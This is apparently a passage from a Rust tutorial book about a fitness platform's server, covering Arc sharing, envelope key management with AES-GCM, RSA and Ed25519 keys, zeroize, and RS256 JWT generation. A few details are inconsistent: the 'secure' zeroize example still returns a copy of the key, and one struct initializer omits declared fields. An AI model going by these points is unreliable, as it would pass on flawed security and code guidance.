│ Create ServerResources │
│ (or focused contexts) │
└─────────────────┬───────────────────┘
│
▼
┌─────────────────────────────────────┐
│ Wrap ServerResources in Arc │
│ Arc::new(resources) │
└─────────────────┬───────────────────┘
│
┌─────────────────┼─────────────────┐
│ │ │
▼ ▼ ▼
┌──────────┐ ┌──────────┐ ┌──────────┐
│Handler 1 │ │Handler 2 │ │Handler N │
│resources │ │resources │ │resources │
│.clone() │ │.clone() │ │.clone() │
└────┬─────┘ └────┬─────┘ └────┬─────┘
│ │ │
└────────────────┼────────────────┘
│
▼
┌──────────────────────────────────┐
│ All point to same resources │
│ (Arc counter = N) │
│ Memory allocated once │
└──────────────────────────────────┘
Rust Idioms Summary
| Idiom | Purpose | Example Location |
|---|---|---|
| Arc<T> | Shared ownership across threads | src/mcp/resources.rs:40-77 |
| Arc::clone() | Increment reference count | src/mcp/resources.rs:98-113 |
| #[derive(Clone)] on Arc struct | Cheap struct cloning | src/mcp/resources.rs:39 |
| Arc<str> | Efficient immutable string sharing | src/mcp/resources.rs:58 |
| Option<Arc<T>> | Optional shared dependencies | src/mcp/resources.rs:72 |
| Focused contexts | Domain-specific DI containers | src/context/mod.rs |
Key Takeaways
- Arc<T> enables shared ownership - Thread-safe reference counting
- Cloning an Arc is cheap - Just increments an atomic counter
- Create once, share everywhere - Wrap expensive resources in Arc at startup
- Service locator is an anti-pattern - Use focused contexts instead
- Explicit dependencies - Function signatures should show what's needed
- Arc vs Rc vs Box - Choose based on threading and ownership needs
- Interior mutability - Use Mutex or RwLock for mutable shared state
Next Chapter
Chapter 5: Cryptographic Key Management - Learn Pierre’s two-tier key management system (MEK + DEK), RSA key generation for JWT signing, and the zeroize crate for secure memory cleanup.
Chapter 5: Cryptographic Key Management
Introduction
Cryptography in production requires careful key management. Pierre implements a two-tier key system:
- MEK (Master Encryption Key) - Tier 1, from environment
- DEK (Database Encryption Key) - Tier 2, encrypted with MEK
Plus RSA key pairs for JWT RS256 signing and Ed25519 for A2A authentication.
This chapter teaches secure key generation, storage, and the Rust patterns that prevent key leakage.
Two-Tier Key Management System
Architecture Overview
┌─────────────────────────────────────────────────────────┐
│ Two-Tier Key Management │
└─────────────────────────────────────────────────────────┘
Tier 1: MEK (Master Encryption Key)
├─ Source: PIERRE_MASTER_ENCRYPTION_KEY environment variable
├─ Size: 32 bytes (256 bits)
├─ Usage: Encrypts DEK before storage
└─ Lifetime: Never stored in database
↓ Encrypts
Tier 2: DEK (Database Encryption Key)
├─ Source: Generated randomly, stored encrypted
├─ Size: 32 bytes (256 bits)
├─ Usage: Encrypts sensitive database fields (tokens, secrets)
└─ Storage: Database, encrypted with MEK
↓ Encrypts
User Data
├─ OAuth tokens
├─ API keys
└─ Sensitive user information
Why two tiers?
- MEK rotation doesn’t require re-encrypting all data
- DEK can be rotated independently
- Separation of concerns: MEK from ops, DEK from code
- Key hierarchy: Industry standard (AWS KMS, GCP KMS use similar)
Reference: AWS KMS Concepts
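The envelope structure above can be sketched with a toy cipher. The XOR function below is a stand-in for AES-256-GCM purely to show the key hierarchy; it is NOT secure and is not Pierre's implementation:

```rust
/// Toy XOR "cipher": a placeholder for AES-256-GCM. NOT secure.
fn toy_cipher(key: &[u8], data: &[u8]) -> Vec<u8> {
    data.iter().zip(key.iter().cycle()).map(|(d, k)| d ^ k).collect()
}

fn main() {
    let mek = b"mek-from-environment-variable-32"; // Tier 1: never stored
    let dek = b"dek-generated-randomly-32-bytes!"; // Tier 2: stored encrypted
    // At rest, only the MEK-encrypted DEK lives in the database.
    let stored_dek = toy_cipher(mek, dek);
    // User data is encrypted under the DEK.
    let ciphertext = toy_cipher(dek, b"oauth-access-token");
    // Reading back: decrypt the DEK with the MEK, then the data with the DEK.
    let recovered_dek = toy_cipher(mek, &stored_dek);
    let plaintext = toy_cipher(&recovered_dek, &ciphertext);
    assert_eq!(plaintext, b"oauth-access-token");
}
```

Because data is encrypted only under the DEK, rotating the MEK means re-encrypting one 32-byte key rather than every row.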
Master Encryption Key (MEK)
Source: src/key_management.rs:14-188
MEK Structure
#![allow(unused)]
fn main() {
/// Master Encryption Key (MEK) - Tier 1
pub struct MasterEncryptionKey {
key: [u8; 32], // Fixed-size array (256 bits)
}
}
Rust Idioms Explained:
- Fixed-size array [u8; 32]
  - Exactly 32 bytes, known at compile time
  - Stack-allocated (no heap)
  - Implements Copy (cheap to pass around)
  - More secure than Vec<u8> (can't be resized accidentally)
- Private field - key is private
  - Can't be accessed directly from outside the module
  - Forces use of safe accessor methods
  - Prevents accidental copying
Loading MEK from Environment
Source: src/key_management.rs:45-85
Important: The MEK is required in all environments. There is no auto-generation fallback. This ensures encrypted data remains accessible across server restarts.
#![allow(unused)]
fn main() {
impl MasterEncryptionKey {
/// Load MEK from environment variable (required)
///
/// # Errors
///
/// Returns an error if:
/// - The `PIERRE_MASTER_ENCRYPTION_KEY` environment variable is not set
/// - The environment variable contains invalid base64 encoding
/// - The decoded key is not exactly 32 bytes
pub fn load_or_generate() -> AppResult<Self> {
env::var("PIERRE_MASTER_ENCRYPTION_KEY").map_or_else(
|_| {
Err(AppError::config(
"PIERRE_MASTER_ENCRYPTION_KEY environment variable is required.\n\n\
This key is used to encrypt sensitive data (OAuth tokens, admin secrets, etc.).\n\
Without a persistent key, encrypted data becomes unreadable after server restart.\n\n\
To generate a key, run:\n\
\x20\x20openssl rand -base64 32\n\n\
Then set it in your environment:\n\
\x20\x20export PIERRE_MASTER_ENCRYPTION_KEY=\"<your-generated-key>\"\n\n\
Or add it to your .env file.",
))
},
|encoded_key| Self::load_from_environment(&encoded_key),
)
}
fn load_from_environment(encoded_key: &str) -> AppResult<Self> {
info!("Loading Master Encryption Key from environment variable");
let key_bytes = Base64Standard.decode(encoded_key).map_err(|e| {
AppError::config(format!(
"Invalid base64 encoding in PIERRE_MASTER_ENCRYPTION_KEY: {e}"
))
})?;
if key_bytes.len() != 32 {
return Err(AppError::config(format!(
"Master encryption key must be exactly 32 bytes, got {} bytes",
key_bytes.len()
)));
}
let mut key = [0u8; 32];
key.copy_from_slice(&key_bytes);
Ok(Self { key })
}
}
}
Rust Idioms Explained:
- .copy_from_slice() method
  - Copies a Vec<u8> into a [u8; 32]
  - Panics if the lengths don't match (we validate first)
  - More efficient than looping
- Early return pattern
  - if key_bytes.len() != 32 { return Err(...) }
  - Avoids deep nesting
  - Clear error handling path
- Error context with .map_err()
  - Wraps the underlying error with a helpful message
  - The user sees "Invalid base64 encoding", not a bare DecodeError
MEK Encryption and Decryption
Source: src/key_management.rs:130-187
#![allow(unused)]
fn main() {
impl MasterEncryptionKey {
/// Encrypt data with the MEK (used to encrypt DEK)
pub fn encrypt(&self, plaintext: &[u8]) -> Result<Vec<u8>> {
use aes_gcm::{aead::Aead, Aes256Gcm, KeyInit, Nonce};
use rand::RngCore;
// Create AES-GCM cipher
let cipher = Aes256Gcm::new_from_slice(&self.key)
.map_err(|e| AppError::internal(format!("Invalid key length: {e}")))?;
// Generate random nonce (12 bytes for AES-GCM)
let mut nonce_bytes = [0u8; 12];
rand::thread_rng().fill_bytes(&mut nonce_bytes);
let nonce = Nonce::from_slice(&nonce_bytes);
// Encrypt the data
let ciphertext = cipher
.encrypt(nonce, plaintext)
.map_err(|e| AppError::internal(format!("Encryption failed: {e}")))?;
// Prepend nonce to ciphertext (needed for decryption)
let mut result = Vec::with_capacity(12 + ciphertext.len());
result.extend_from_slice(&nonce_bytes);
result.extend_from_slice(&ciphertext);
Ok(result)
}
pub fn decrypt(&self, encrypted_data: &[u8]) -> Result<Vec<u8>> {
use aes_gcm::{aead::Aead, Aes256Gcm, KeyInit, Nonce};
if encrypted_data.len() < 12 {
return Err(AppError::invalid_input("Encrypted data too short").into());
}
let cipher = Aes256Gcm::new_from_slice(&self.key)
.map_err(|e| AppError::internal(format!("Invalid key length: {e}")))?;
// Extract nonce and ciphertext
let nonce = Nonce::from_slice(&encrypted_data[..12]);
let ciphertext = &encrypted_data[12..];
// Decrypt the data
let plaintext = cipher
.decrypt(nonce, ciphertext)
.map_err(|e| AppError::internal(format!("Decryption failed: {e}")))?;
Ok(plaintext)
}
}
}
Cryptography Explained:
- AES-256-GCM - Authenticated encryption
  - AES-256: Symmetric encryption (256-bit key)
  - GCM: Galois/Counter Mode (authenticated, prevents tampering)
  - Industry standard (used by TLS, IPsec, etc.)
- Nonce (Number used Once)
  - 12-byte random value
  - Must be unique for each encryption
  - Stored alongside the ciphertext
  - Prevents identical plaintexts from producing the same ciphertext
- Prepending the nonce to the ciphertext
  - Common pattern: [nonce || ciphertext]
  - Decryption extracts the first 12 bytes
  - Alternative: separate storage (more complex)
Reference: NIST AES-GCM Spec
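Splitting the payload back apart is a two-line operation; a sketch of the decrypt-side layout handling (helper name is illustrative):

```rust
/// Split a payload laid out as [12-byte nonce || ciphertext].
/// Returns None when the payload is too short to contain a nonce.
fn split_nonce_payload(data: &[u8]) -> Option<(&[u8], &[u8])> {
    if data.len() < 12 {
        return None;
    }
    Some(data.split_at(12))
}

fn main() {
    let payload = [7u8; 20]; // 12-byte nonce + 8-byte ciphertext
    let (nonce, ciphertext) = split_nonce_payload(&payload).unwrap();
    assert_eq!(nonce.len(), 12);
    assert_eq!(ciphertext.len(), 8);
    assert!(split_nonce_payload(&[0u8; 5]).is_none());
}
```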
MEK Setup for Development
Unlike some systems that auto-generate keys for development convenience, Pierre requires the MEK to be set explicitly. This is intentional—it prevents the common mistake of deploying to production without a persistent key.
Generating a MEK:
# Generate a cryptographically secure 32-byte key
openssl rand -base64 32
# Example output: K7xL9mP2qR4vT6yZ8aB0cD2eF4gH6iJ8kL0mN2oP4qR=
Setting the MEK:
# Option 1: Environment variable
export PIERRE_MASTER_ENCRYPTION_KEY="K7xL9mP2qR4vT6yZ8aB0cD2eF4gH6iJ8kL0mN2oP4qR="
# Option 2: .env file (recommended for development)
echo 'PIERRE_MASTER_ENCRYPTION_KEY="K7xL9mP2qR4vT6yZ8aB0cD2eF4gH6iJ8kL0mN2oP4qR="' >> .env
Why No Auto-Generation?
| Approach | Problem |
|---|---|
| Auto-generate MEK | Data becomes unreadable after restart (encrypted tokens, secrets lost) |
| In-memory only | Same as above—no persistence across restarts |
| Store generated key | Security risk—key in logs, filesystem |
Pierre’s approach ensures:
- Explicit configuration - You must consciously set the key
- Persistence - The same key works across restarts
- No secrets in logs - MEK is never logged or displayed
- Clear errors - Helpful message if MEK is missing
Error When MEK Not Set:
Error: PIERRE_MASTER_ENCRYPTION_KEY environment variable is required.
This key is used to encrypt sensitive data (OAuth tokens, admin secrets, etc.).
Without a persistent key, encrypted data becomes unreadable after server restart.
To generate a key, run:
openssl rand -base64 32
Then set it in your environment:
export PIERRE_MASTER_ENCRYPTION_KEY="<your-generated-key>"
Or add it to your .env file.
RSA Keys for JWT Signing
Pierre uses RS256 (RSA with SHA-256) for JWT signing, requiring RSA key pairs.
Source: src/admin/jwks.rs:87-133
RSA Key Pair Structure
#![allow(unused)]
fn main() {
/// RSA key pair with metadata
#[derive(Clone)]
pub struct RsaKeyPair {
/// Unique key identifier
pub kid: String,
/// Private key for signing
pub private_key: RsaPrivateKey,
/// Public key for verification
pub public_key: RsaPublicKey,
/// Key creation timestamp
pub created_at: DateTime<Utc>,
/// Whether this is the currently active signing key
pub is_active: bool,
}
}
Fields explained:
- kid (Key ID): Identifies the key in the JWKS (e.g., "key_2025_01")
- private_key: Used to sign JWTs (kept secret)
- public_key: Distributed via the JWKS (anyone can verify)
- is_active: Only one active key at a time
Generating RSA Keys
Source: src/admin/jwks.rs:103-133
#![allow(unused)]
fn main() {
impl RsaKeyPair {
/// Generate RSA key pair with configurable key size
pub fn generate_with_key_size(kid: &str, key_size_bits: usize) -> Result<Self> {
use rand::rngs::OsRng;
let mut rng = OsRng; // Cryptographically secure RNG
let private_key = RsaPrivateKey::new(&mut rng, key_size_bits)
.map_err(|e| AppError::internal(
format!("Failed to generate RSA private key: {e}")
))?;
let public_key = RsaPublicKey::from(&private_key);
Ok(Self {
kid: kid.to_owned(),
private_key,
public_key,
created_at: Utc::now(),
is_active: true,
})
}
}
}
Rust Idioms Explained:
- OsRng - Operating system RNG
  - Cryptographically secure random number generator
  - Uses the OS entropy source (Linux: /dev/urandom, Windows: BCrypt)
  - Never use rand::thread_rng() for cryptographic keys
- RsaPublicKey::from(&private_key)
  - The public key is mathematically derived from the private key
  - No randomness needed
  - Implements the From trait
- Key sizes:
  - 2048 bits: Minimum, fast generation (~250ms)
  - 4096 bits: Recommended, slow generation (~10s)
  - Pierre uses 4096 in production, 2048 in tests
Reference: RSA Key Sizes
JWKS (JSON Web Key Set)
Source: src/admin/jwks.rs:62-85
#![allow(unused)]
fn main() {
/// JWK (JSON Web Key) representation
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct JsonWebKey {
/// Key type (always "RSA" for RS256)
pub kty: String,
/// Public key use (always "sig" for signature)
#[serde(rename = "use")]
pub key_use: String,
/// Key ID for rotation tracking
pub kid: String,
/// Algorithm (RS256)
pub alg: String,
/// RSA modulus (base64url encoded)
pub n: String,
/// RSA exponent (base64url encoded)
pub e: String,
}
/// JWKS (JSON Web Key Set) container
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct JsonWebKeySet {
pub keys: Vec<JsonWebKey>,
}
}
JWKS format example:
{
"keys": [
{
"kty": "RSA",
"use": "sig",
"kid": "key_2025_01",
"alg": "RS256",
"n": "xGOr-H...(base64url)...",
"e": "AQAB"
}
]
}
Fields explained:
- kty: Key type (RSA, EC, oct)
- use: Key usage (sig = signature, enc = encryption)
- kid: Key identifier (for rotation)
- alg: Algorithm (RS256, ES256, etc.)
- n: RSA modulus (public)
- e: RSA exponent (usually 65537 = "AQAB" in base64url)
Reference: RFC 7517 - JSON Web Key
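The "AQAB" value can be checked by hand: 65537 is 0x010001, i.e. the big-endian bytes [0x01, 0x00, 0x01]. A hand-rolled base64url encoder (for illustration only; the codebase uses the base64 crate's URL_SAFE_NO_PAD engine, as shown below) reproduces it:

```rust
/// Minimal base64url encoding without padding (illustration only).
fn b64url_nopad(bytes: &[u8]) -> String {
    const ALPHABET: &[u8; 64] =
        b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_";
    let mut out = String::new();
    for chunk in bytes.chunks(3) {
        // Pack up to 3 bytes into a 24-bit group, then emit 6-bit sextets.
        let b = [chunk[0], *chunk.get(1).unwrap_or(&0), *chunk.get(2).unwrap_or(&0)];
        let n = (u32::from(b[0]) << 16) | (u32::from(b[1]) << 8) | u32::from(b[2]);
        let sextets = [(n >> 18) & 63, (n >> 12) & 63, (n >> 6) & 63, n & 63];
        // 1 input byte -> 2 output chars, 2 bytes -> 3 chars, 3 bytes -> 4 chars
        let emit = chunk.len() + 1;
        for &s in &sextets[..emit] {
            out.push(ALPHABET[s as usize] as char);
        }
    }
    out
}

fn main() {
    // The common RSA exponent e = 65537 encodes to "AQAB".
    assert_eq!(b64url_nopad(&[0x01, 0x00, 0x01]), "AQAB");
}
```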
Converting to JWK Format
Source: src/admin/jwks.rs:135-162
#![allow(unused)]
fn main() {
impl RsaKeyPair {
pub fn to_jwk(&self) -> Result<JsonWebKey> {
use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine};
use rsa::traits::PublicKeyParts;
// Extract RSA components
let n = self.public_key.n(); // Modulus (BigUint)
let e = self.public_key.e(); // Exponent (BigUint)
// Convert to big-endian bytes
let n_bytes = n.to_bytes_be();
let e_bytes = e.to_bytes_be();
// Encode as base64url (no padding)
let n_b64 = URL_SAFE_NO_PAD.encode(&n_bytes);
let e_b64 = URL_SAFE_NO_PAD.encode(&e_bytes);
Ok(JsonWebKey {
kty: "RSA".to_owned(),
key_use: "sig".to_owned(),
kid: self.kid.clone(),
alg: "RS256".to_owned(),
n: n_b64,
e: e_b64,
})
}
}
}
Cryptography Explained:
- BigUint to bytes
  - RSA components are very large integers
  - .to_bytes_be() = big-endian byte representation
  - Standard format for JWK
- Base64url encoding
  - URL-safe variant (replaces + and / with - and _)
  - No padding (=) for cleaner URLs
  - Standard for JWT/JWKS
Ed25519 for A2A Authentication
A2A protocol uses Ed25519 (elliptic curve) for faster, smaller signatures.
Source: src/crypto/keys.rs:16-66
Ed25519 Key Generation
#![allow(unused)]
fn main() {
/// Ed25519 keypair for A2A client authentication
#[derive(Debug, Clone)]
pub struct A2AKeypair {
pub public_key: String, // Base64 encoded
pub private_key: String, // Base64 encoded
}
impl A2AKeyManager {
pub fn generate_keypair() -> Result<A2AKeypair> {
use rand::RngCore;
let mut rng = OsRng;
let mut secret_bytes = [0u8; 32];
rng.fill_bytes(&mut secret_bytes);
let signing_key = SigningKey::from_bytes(&secret_bytes);
// Security: Zeroize secret bytes to prevent memory exposure
secret_bytes.zeroize();
let verifying_key = signing_key.verifying_key();
let public_key = general_purpose::STANDARD.encode(verifying_key.as_bytes());
let private_key = general_purpose::STANDARD.encode(signing_key.as_bytes());
Ok(A2AKeypair { public_key, private_key })
}
}
}
Ed25519 vs RSA:
| Feature | Ed25519 | RSA-4096 |
|---|---|---|
| Key size | 32 bytes | 512 bytes |
| Signature size | 64 bytes | 512 bytes |
| Generation speed | Fast (~1ms) | Slow (~10s) |
| Verification speed | Fast | Slower |
| Use case | Modern systems | Legacy compatibility |
Why does Pierre use both?
- RS256 (RSA): JWT standard, widely supported
- Ed25519: A2A only, modern, efficient
Reference: Ed25519 Paper
Zeroize: Secure Memory Cleanup
The zeroize crate prevents key material from lingering in memory.
Source: src/crypto/keys.rs:54
The Memory Leak Problem
#![allow(unused)]
fn main() {
use rand::rngs::OsRng;
use rand::RngCore;
use zeroize::Zeroize;

// WITHOUT zeroize - INSECURE
fn generate_key_insecure() -> [u8; 32] {
    let mut rng = OsRng;
    let mut key = [0u8; 32];
    rng.fill_bytes(&mut key);
    key
    // The local copy of the key bytes lingers in memory after return!
    // Could be swapped to disk, dumped in a crash, etc.
}

// WITH zeroize - SECURE
fn generate_key_secure() -> [u8; 32] {
    let mut rng = OsRng;
    let mut secret_bytes = [0u8; 32];
    rng.fill_bytes(&mut secret_bytes);
    let key = secret_bytes; // Copy to return value
    secret_bytes.zeroize(); // Overwrite the original with zeros
    key
}
}
Zeroize Usage
Source: src/crypto/keys.rs:45-55
#![allow(unused)]
fn main() {
use zeroize::Zeroize;
let mut secret_bytes = [0u8; 32];
rng.fill_bytes(&mut secret_bytes);
let signing_key = SigningKey::from_bytes(&secret_bytes);
// Overwrite secret_bytes with zeros
secret_bytes.zeroize(); // ← Critical security step
// secret_bytes memory now contains all zeros
// Prevents recovery via memory dumps
}
Rust Idioms Explained:
- .zeroize() method: Overwrites the memory with zeros using writes the compiler cannot optimize away (volatile semantics).
- Zeroize trait: Implemented for arrays, Vecs, and Strings; derivable with #[derive(Zeroize)].
- ZeroizeOnDrop: Zeroizes automatically when the value is dropped, so cleanup happens even if the code panics.
Example with automatic zeroize:
#![allow(unused)]
fn main() {
use zeroize::{Zeroize, ZeroizeOnDrop};
#[derive(Zeroize, ZeroizeOnDrop)]
struct SecretKey {
key: [u8; 32],
}
fn use_key() {
let secret = SecretKey { key: [1; 32] };
// Use secret...
} // ← Automatically zeroized on drop!
}
Reference: zeroize crate docs
Key Takeaways
- Two-tier keys: MEK from environment, DEK from database
- AES-256-GCM: Authenticated encryption with nonces
- RSA for JWT: 4096-bit keys for production security
- Ed25519 for A2A: Smaller, faster elliptic curve signatures
- OsRng for crypto: Never use weak RNGs for keys
- zeroize for cleanup: Prevent key leakage in memory
- Conditional compilation: #[cfg(debug_assertions)] for safe logging
Next Chapter
Chapter 6: JWT Authentication with RS256 - Learn JWT token generation, validation, claims-based authorization, and the jsonwebtoken crate.
Chapter 06: JWT Authentication with RS256
This chapter explores JWT (JSON Web Token) authentication using RS256 asymmetric signing in the Pierre Fitness Platform. You’ll learn how the platform implements secure token generation, validation, and session management using RSA key pairs from the JWKS system covered in Chapter 5.
JWT Structure and Claims
JWT tokens consist of three base64url-encoded parts separated by dots: header.payload.signature. The Pierre platform uses RS256 (RSA Signature with SHA-256) for asymmetric signing, allowing token verification without sharing the private key.
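Structurally, any JWT can be split on the dots before any cryptographic work happens. A quick sketch (the token value here is a made-up placeholder, not a real signed token):

```rust
fn main() {
    // Placeholder token: base64url header and payload with a fake signature
    let token = "eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiI0MiJ9.c2lnbmF0dXJl";
    let parts: Vec<&str> = token.split('.').collect();
    assert_eq!(parts.len(), 3);
    let (header, payload, signature) = (parts[0], parts[1], parts[2]);
    println!("header={header} payload={payload} signature={signature}");
}
```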
Standard JWT Claims
The platform follows RFC 7519 for standard JWT claims:
Source: src/auth.rs:125-153
#![allow(unused)]
fn main() {
/// JWT claims for user authentication
#[derive(Debug, Serialize, Deserialize)]
pub struct Claims {
/// User ID
pub sub: String,
/// User email
pub email: String,
/// Issued at timestamp (seconds since Unix epoch)
pub iat: i64,
/// Expiration timestamp
pub exp: i64,
/// Issuer (who issued the token)
pub iss: String,
/// JWT ID (unique identifier for this token)
pub jti: String,
/// Available fitness providers
pub providers: Vec<String>,
/// Audience (who the token is intended for)
pub aud: String,
/// Tenant ID (optional for backward compatibility with existing tokens)
#[serde(skip_serializing_if = "Option::is_none")]
pub tenant_id: Option<String>,
/// Original user ID when impersonating (the super admin)
#[serde(skip_serializing_if = "Option::is_none")]
pub impersonator_id: Option<String>,
/// Impersonation session ID for audit trail
#[serde(skip_serializing_if = "Option::is_none")]
pub impersonation_session_id: Option<String>,
}
}
Each claim serves a specific purpose:
- sub (Subject): Unique user identifier (UUID)
- iss (Issuer): Service that created the token ("pierre-mcp-server")
- aud (Audience): Intended recipient of the token ("mcp" or "admin-api")
- exp (Expiration): Unix timestamp when the token becomes invalid
- iat (Issued At): Unix timestamp when the token was created
- jti (JWT ID): Unique token identifier (prevents replay attacks)
Custom Claims for Multi-Tenancy
The platform extends standard claims with domain-specific fields:
- email: User's email address for quick lookups
- providers: List of connected fitness providers (Garmin, Strava, etc.)
- tenant_id: Multi-tenant isolation identifier (optional for backward compatibility)
Rust Idiom: #[serde(skip_serializing_if = "Option::is_none")]
This attribute prevents including null values in the JSON payload, reducing token size. The Option<String> type provides compile-time safety for optional fields while maintaining backward compatibility with tokens that don’t include tenant_id.
RS256 vs HS256 Asymmetric Signing
The platform uses RS256 (RSA Signature with SHA-256) instead of HS256 (HMAC with SHA-256) for several security advantages:
HS256 Symmetric Signing (Not Used)
┌─────────────┐ ┌─────────────┐
│ Server │ │ Client │
│ │ │ │
│ Secret Key │◄──────shared───────┤ Secret Key │
│ │ │ │
│ Sign Token │────────────────────►│ Verify Token│
└─────────────┘ └─────────────┘
Problem: The same secret key both signs and verifies tokens. Any client that needs to verify tokens must hold the shared secret, and anyone who holds the secret can also forge valid tokens.
RS256 Asymmetric Signing (used by Pierre)
┌─────────────────┐ ┌─────────────────┐
│ Server │ │ Client │
│ │ │ │
│ Private Key │ │ Public Key │
│ (JWKS secret) │ │ (JWKS public) │
│ │ │ │
│ Sign Token ────►│────token──────►│ Verify Token │
│ │ │ │
│ Rotate Keys │◄───GET /jwks◄──┤ Fetch Public │
└─────────────────┘ └─────────────────┘
Advantage: The server holds the private key (MEK-encrypted in the database). Clients download only public keys from /.well-known/jwks.json endpoint. Even if a client is compromised, attackers cannot forge tokens.
Source: src/auth.rs:232-243
#![allow(unused)]
fn main() {
// Get active RSA key from JWKS manager
let active_key = jwks_manager.get_active_key()?;
let encoding_key = active_key.encoding_key()?;
// Create RS256 header with kid
let mut header = Header::new(Algorithm::RS256);
header.kid = Some(active_key.kid.clone());
let token = encode(&header, &claims, &encoding_key)?;
}
The kid (Key ID) in the header allows the platform to rotate RSA keys without invalidating existing tokens. When validating a token, the platform looks up the corresponding public key by kid.
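The rotation behavior the kid enables can be sketched with a plain map (this KeyStore and its methods are hypothetical stand-ins, not the Pierre JwksManager API): old key IDs stay resolvable for verification while new tokens are signed with the active key.

```rust
use std::collections::HashMap;

// Hypothetical stand-in for a JWKS key store keyed by kid.
struct KeyStore {
    active_kid: String,
    keys: HashMap<String, &'static str>, // kid -> key material placeholder
}

impl KeyStore {
    // Add a new key and make it active; previous entries are kept so
    // tokens signed with older kids still verify.
    fn rotate(&mut self, new_kid: &str, key: &'static str) {
        self.keys.insert(new_kid.to_owned(), key);
        self.active_kid = new_kid.to_owned();
    }

    fn key_for(&self, kid: &str) -> Option<&&'static str> {
        self.keys.get(kid)
    }
}

fn main() {
    let mut store = KeyStore {
        active_kid: "key_2025_01".to_owned(),
        keys: HashMap::from([("key_2025_01".to_owned(), "pem-1")]),
    };
    store.rotate("key_2025_07", "pem-2");
    // Tokens signed with the old kid still find their verification key
    assert!(store.key_for("key_2025_01").is_some());
    assert_eq!(store.active_kid, "key_2025_07");
}
```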
Token Generation with JWKS Integration
Token generation involves creating claims, selecting the active RSA key, and signing with the private key.
User Authentication Tokens
The AuthManager generates tokens for authenticated users after successful login:
Source: src/auth.rs:212-243
#![allow(unused)]
fn main() {
/// Generate a JWT token for a user with RS256 asymmetric signing
///
/// # Errors
///
/// Returns an error if:
/// - JWT encoding fails due to invalid claims
/// - System time is unavailable for timestamp generation
/// - JWKS manager has no active key
pub fn generate_token(
&self,
user: &User,
jwks_manager: &crate::admin::jwks::JwksManager,
) -> Result<String> {
let now = Utc::now();
let expiry = now + Duration::hours(self.token_expiry_hours);
let claims = Claims {
sub: user.id.to_string(),
email: user.email.clone(),
iat: now.timestamp(),
exp: expiry.timestamp(),
iss: crate::constants::service_names::PIERRE_MCP_SERVER.to_owned(),
jti: Uuid::new_v4().to_string(),
providers: user.available_providers(),
aud: crate::constants::service_names::MCP.to_owned(),
tenant_id: user.tenant_id.clone(),
};
// Get active RSA key from JWKS manager
let active_key = jwks_manager.get_active_key()?;
let encoding_key = active_key.encoding_key()?;
// Create RS256 header with kid
let mut header = Header::new(Algorithm::RS256);
header.kid = Some(active_key.kid.clone());
let token = encode(&header, &claims, &encoding_key)?;
Ok(token)
}
}
Rust Idiom: Uuid::new_v4().to_string()
Using UUIDv4 for jti (JWT ID) ensures each token has a globally unique identifier. This prevents token replay attacks and allows the platform to revoke specific tokens by tracking their jti in a revocation list.
Admin Authentication Tokens
Admin tokens use a separate claims structure with fine-grained permissions:
Source: src/admin/jwt.rs:171-188
#![allow(unused)]
fn main() {
/// JWT claims for admin tokens
#[derive(Debug, Clone, Serialize, Deserialize)]
struct AdminTokenClaims {
// Standard JWT claims
iss: String, // Issuer: "pierre-mcp-server"
sub: String, // Subject: token ID
aud: String, // Audience: "admin-api"
exp: u64, // Expiration time
iat: u64, // Issued at
nbf: u64, // Not before
jti: String, // JWT ID: token ID
// Custom claims
service_name: String,
permissions: Vec<crate::admin::models::AdminPermission>,
is_super_admin: bool,
token_type: String, // Always "admin"
}
}
Admin tokens include:
- permissions: List of specific admin permissions (e.g., ["users:read", "users:write"])
- is_super_admin: Boolean flag for unrestricted access
- service_name: Identifies which service created the token
- token_type: Discriminator to prevent user tokens from being used as admin tokens
Source: src/admin/jwt.rs:64-97
#![allow(unused)]
fn main() {
/// Generate JWT token using RS256 (asymmetric signing)
///
/// # Errors
/// Returns an error if JWT encoding fails
pub fn generate_token(
&self,
token_id: &str,
service_name: &str,
permissions: &AdminPermissions,
is_super_admin: bool,
expires_at: Option<DateTime<Utc>>,
jwks_manager: &crate::admin::jwks::JwksManager,
) -> Result<String> {
let now = Utc::now();
let exp = expires_at.unwrap_or_else(|| now + Duration::days(365));
let claims = AdminTokenClaims {
// Standard JWT claims
iss: service_names::PIERRE_MCP_SERVER.into(),
sub: token_id.to_owned(),
aud: service_names::ADMIN_API.into(),
exp: u64::try_from(exp.timestamp().max(0)).unwrap_or(0),
iat: u64::try_from(now.timestamp().max(0)).unwrap_or(0),
nbf: u64::try_from(now.timestamp().max(0)).unwrap_or(0),
jti: token_id.to_owned(),
// Custom claims
service_name: service_name.to_owned(),
permissions: permissions.to_vec(),
is_super_admin,
token_type: "admin".into(),
};
// Sign with RS256 using JWKS
Ok(jwks_manager
.sign_admin_token(&claims)
.map_err(|e| AppError::internal(format!("Failed to generate RS256 admin JWT: {e}")))?)
}
}
Rust Idiom: u64::try_from(exp.timestamp().max(0)).unwrap_or(0)
This pattern handles two edge cases:
- max(0): Prevents negative timestamps (before Unix epoch)
- try_from(): Safely converts i64 to u64 (timestamps should always be positive)
- unwrap_or(0): Falls back to the epoch if conversion fails (defensive programming)
The combination ensures the exp claim is always a valid positive integer.
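In isolation, the conversion behaves like this (the function name is ours; the expression is the one from the listing):

```rust
// Claim-timestamp conversion from the admin token generator:
// clamp pre-epoch values to 0, then convert i64 -> u64.
fn to_claim_timestamp(ts: i64) -> u64 {
    u64::try_from(ts.max(0)).unwrap_or(0)
}

fn main() {
    assert_eq!(to_claim_timestamp(-42), 0); // pre-epoch clamps to 0
    assert_eq!(to_claim_timestamp(1_700_000_000), 1_700_000_000);
    println!("ok");
}
```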
OAuth Access Tokens
The platform generates OAuth 2.0 access tokens with limited scopes:
Source: src/auth.rs:588-622
#![allow(unused)]
fn main() {
/// Generate OAuth access token with RS256 asymmetric signing
///
/// This method uses RSA private key from JWKS manager for token signing.
/// Clients can verify tokens using the public key from /.well-known/jwks.json
///
/// # Errors
///
/// Returns an error if:
/// - JWT token generation fails
/// - System time is unavailable
/// - JWKS manager has no active key
pub fn generate_oauth_access_token(
&self,
jwks_manager: &crate::admin::jwks::JwksManager,
user_id: &Uuid,
scopes: &[String],
tenant_id: Option<String>,
) -> Result<String> {
let now = Utc::now();
let expiry =
now + Duration::hours(crate::constants::limits::OAUTH_ACCESS_TOKEN_EXPIRY_HOURS);
let claims = Claims {
sub: user_id.to_string(),
email: format!("oauth_{user_id}@system.local"),
